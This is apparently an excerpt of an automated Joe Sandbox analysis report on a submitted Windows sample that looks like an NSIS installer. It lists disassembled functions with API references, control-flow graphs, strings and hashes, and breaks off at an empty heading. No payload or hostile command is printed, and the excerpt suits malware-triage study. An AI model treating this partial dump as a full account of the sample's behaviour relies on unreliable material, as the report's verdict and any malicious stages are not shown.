                                    • Sleep(%d), xrefs: 0040169D
                                    • Jump: %d, xrefs: 00401602
                                    • Call: %d, xrefs: 0040165A
                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                    • Rename failed: %s, xrefs: 0040194B
                                    • Rename: %s, xrefs: 004018F8
                                    • SetFileAttributes failed., xrefs: 004017A1
                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                    • BringToFront, xrefs: 004016BD
                                    • Aborting: "%s", xrefs: 0040161D
                                    • Rename on reboot: %s, xrefs: 00401943
                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                    • API String ID: 2872004960-3619442763
                                    • Opcode ID: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                    • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                    • Opcode Fuzzy Hash: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                    • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                    Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 267 40592c-405944 call 4062fc 270 405946-405956 call 405f51 267->270 271 405958-405990 call 405ed3 267->271 279 4059b3-4059dc call 403e95 call 40677e 270->279 276 405992-4059a3 call 405ed3 271->276 277 4059a8-4059ae lstrcatW 271->277 276->277 277->279 285 405a70-405a78 call 40677e 279->285 286 4059e2-4059e7 279->286 292 405a86-405a8d 285->292 293 405a7a-405a81 call 406805 285->293 286->285 287 4059ed-405a15 call 405ed3 286->287 287->285 294 405a17-405a1b 287->294 296 405aa6-405acb LoadImageW 292->296 297 405a8f-405a95 292->297 293->292 301 405a1d-405a2c call 405d06 294->301 302 405a2f-405a3b lstrlenW 294->302 299 405ad1-405b13 RegisterClassW 296->299 300 405b66-405b6e call 40141d 296->300 297->296 298 405a97-405a9c call 403e74 297->298 298->296 306 405c35 299->306 307 405b19-405b61 SystemParametersInfoW CreateWindowExW 299->307 319 405b70-405b73 300->319 320 405b78-405b83 call 403e95 300->320 301->302 303 405a63-405a6b call 406722 call 406009 302->303 304 405a3d-405a4b lstrcmpiW 302->304 303->285 304->303 311 405a4d-405a57 GetFileAttributesW 304->311 310 405c37-405c3e 306->310 307->300 316 405a59-405a5b 311->316 317 405a5d-405a5e call 406751 311->317 316->303 316->317 317->303 319->310 325 405b89-405ba6 ShowWindow LoadLibraryW 320->325 326 405c0c-405c14 call 405047 320->326 328 405ba8-405bad LoadLibraryW 325->328 329 405baf-405bc1 GetClassInfoW 325->329 334 405c16-405c1c 326->334 335 405c2e-405c30 call 40141d 326->335 328->329 330 405bc3-405bd3 GetClassInfoW RegisterClassW 329->330 331 405bd9-405c0a DialogBoxParamW call 40141d call 403c68 329->331 330->331 331->310 334->319 337 405c22-405c29 call 40141d 334->337 335->306 337->319
                                    APIs
                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                    • lstrcatW.KERNEL32(004D30C0,00447240), ref: 004059AE
                                    • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                    • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                    • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                    • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                      • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                    • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                    • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                    • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                    • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                    • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                    • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                    • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                    • API String ID: 608394941-1650083594
                                    • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                    • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                    • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                    • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                    Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 00401A76
                                    • CompareFileTime.KERNEL32(-00000014,?,ConservationNtNat,ConservationNtNat,00000000,00000000,ConservationNtNat,004CB0B0,00000000,00000000), ref: 00401AA0
                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                    • String ID: ConservationNtNat$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                    • API String ID: 4286501637-1719497858
                                    • Opcode ID: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                    • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                    • Opcode Fuzzy Hash: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                    • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                    Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 428 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 431 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 428->431 432 4035d7-4035dc 428->432 440 403615 431->440 441 4036fc-40370a call 4032d2 431->441 433 4037b6-4037ba 432->433 443 40361a-403631 440->443 447 403710-403713 441->447 448 4037c5-4037ca 441->448 445 403633 443->445 446 403635-403637 call 403336 443->446 445->446 452 40363c-40363e 446->452 450 403715-40372d call 403368 call 403336 447->450 451 40373f-403769 GlobalAlloc call 403368 call 40337f 447->451 448->433 450->448 478 403733-403739 450->478 451->448 476 40376b-40377c 451->476 454 403644-40364b 452->454 455 4037bd-4037c4 call 4032d2 452->455 460 4036c7-4036cb 454->460 461 40364d-403661 call 405e0c 454->461 455->448 464 4036d5-4036db 460->464 465 4036cd-4036d4 call 4032d2 460->465 461->464 475 403663-40366a 461->475 472 4036ea-4036f4 464->472 473 4036dd-4036e7 call 407281 464->473 465->464 472->443 477 4036fa 472->477 473->472 475->464 481 40366c-403673 475->481 482 403784-403787 476->482 483 40377e 476->483 477->441 478->448 478->451 481->464 484 403675-40367c 481->484 485 40378a-403792 482->485 483->482 484->464 486 40367e-403685 484->486 485->485 487 403794-4037af SetFilePointer call 405e0c 485->487 486->464 488 403687-4036a7 486->488 491 4037b4 487->491 488->448 490 4036ad-4036b1 488->490 492 4036b3-4036b7 490->492 493 4036b9-4036c1 490->493 491->433 492->477 492->493 493->464 494 4036c3-4036c5 493->494 494->464
                                    APIs
                                    • GetTickCount.KERNEL32 ref: 00403598
                                    • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                    • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                    Strings
                                    • Null, xrefs: 0040367E
                                    • soft, xrefs: 00403675
                                    • Error launching installer, xrefs: 004035D7
                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                    • Inst, xrefs: 0040366C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                    • API String ID: 4283519449-527102705
                                    • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                    • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                    • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                    • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                    Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 495 40337f-403396 496 403398 495->496 497 40339f-4033a7 495->497 496->497 498 4033a9 497->498 499 4033ae-4033b3 497->499 498->499 500 4033c3-4033d0 call 403336 499->500 501 4033b5-4033be call 403368 499->501 505 4033d2 500->505 506 4033da-4033e1 500->506 501->500 507 4033d4-4033d5 505->507 508 4033e7-403407 GetTickCount call 4072f2 506->508 509 403518-40351a 506->509 510 403539-40353d 507->510 521 403536 508->521 523 40340d-403415 508->523 511 40351c-40351f 509->511 512 40357f-403583 509->512 514 403521 511->514 515 403524-40352d call 403336 511->515 516 403540-403546 512->516 517 403585 512->517 514->515 515->505 530 403533 515->530 519 403548 516->519 520 40354b-403559 call 403336 516->520 517->521 519->520 520->505 532 40355f-403572 WriteFile 520->532 521->510 526 403417 523->526 527 40341a-403428 call 403336 523->527 526->527 527->505 533 40342a-403433 527->533 530->521 534 403511-403513 532->534 535 403574-403577 532->535 536 403439-403456 call 407312 533->536 534->507 535->534 537 403579-40357c 535->537 540 40350a-40350c 536->540 541 40345c-403473 GetTickCount 536->541 537->512 540->507 542 403475-40347d 541->542 543 4034be-4034c2 541->543 544 403485-4034bb MulDiv wsprintfW call 404f72 542->544 545 40347f-403483 542->545 546 4034c4-4034c7 543->546 547 4034ff-403502 543->547 544->543 545->543 545->544 550 4034e7-4034ed 546->550 551 4034c9-4034db WriteFile 546->551 547->523 548 403508 547->548 548->521 552 4034f3-4034f7 550->552 551->534 554 4034dd-4034e0 551->554 552->536 556 4034fd 552->556 554->534 555 4034e2-4034e5 554->555 555->552 556->521
                                    APIs
                                    • GetTickCount.KERNEL32 ref: 004033E7
                                    • GetTickCount.KERNEL32 ref: 00403464
                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                    • wsprintfW.USER32 ref: 004034A4
                                    • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                    • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: CountFileTickWrite$wsprintf
                                    • String ID: ... %d%%$P1B$X1C$X1C
                                    • API String ID: 651206458-1535804072
                                    • Opcode ID: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                    • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                    • Opcode Fuzzy Hash: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                    • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                    Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 557 401eb9-401ec4 558 401f24-401f26 557->558 559 401ec6-401ec9 557->559 560 401f53-401f7b GlobalAlloc call 406805 558->560 561 401f28-401f2a 558->561 562 401ed5-401ee3 call 4062a3 559->562 563 401ecb-401ecf 559->563 576 4030e3-4030f2 560->576 577 402387-40238d GlobalFree 560->577 565 401f3c-401f4e call 406009 561->565 566 401f2c-401f36 call 4062a3 561->566 574 401ee4-402702 call 406805 562->574 563->559 567 401ed1-401ed3 563->567 565->577 566->565 567->562 573 401ef7-402e50 call 406009 * 3 567->573 573->576 589 402708-40270e 574->589 577->576 589->576
                                    APIs
                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                    • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: FreeGloballstrcpyn
                                    • String ID: ConservationNtNat$Exch: stack < %d elements$Pop: stack empty
                                    • API String ID: 1459762280-4275581105
                                    • Opcode ID: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                    • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                    • Opcode Fuzzy Hash: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                    • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                    Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 592 4022fd-402325 call 40145c GetFileVersionInfoSizeW 595 4030e3-4030f2 592->595 596 40232b-402339 GlobalAlloc 592->596 596->595 597 40233f-40234e GetFileVersionInfoW 596->597 599 402350-402367 VerQueryValueW 597->599 600 402384-40238d GlobalFree 597->600 599->600 603 402369-402381 call 405f51 * 2 599->603 600->595 603->600
                                    APIs
                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                    • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                    • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                    • String ID:
                                    • API String ID: 3376005127-0
                                    • Opcode ID: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                    • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                    • Opcode Fuzzy Hash: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                    • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                    Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 608 402b23-402b37 GlobalAlloc 609 402b39-402b49 call 401446 608->609 610 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 608->610 615 402b70-402b73 609->615 610->615 616 402b93 615->616 617 402b75-402b8d call 405f6a WriteFile 615->617 618 4030e3-4030f2 616->618 617->616 622 402384-40238d GlobalFree 617->622 622->618
                                    APIs
                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                    • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                    • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1637072190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1637050181.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637117824.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1637258441.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_hfi47s4wOT.jbxd
                                    Similarity
                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                    • String ID:
                                    • API String ID: 2568930968-0
                                    • Opcode ID: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                    • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                    • Opcode Fuzzy Hash: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                    • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                    Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 625 402713-40273b call 406009 * 2 630 402746-402749 625->630 631 40273d-402743 call 40145c 625->631 633 402755-402758 630->633 634 40274b-402752 call 40145c 630->634 631->630 635 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 633->635 636 40275a-402761 call 40145c 633->636 634->633 636->635
                                    APIs
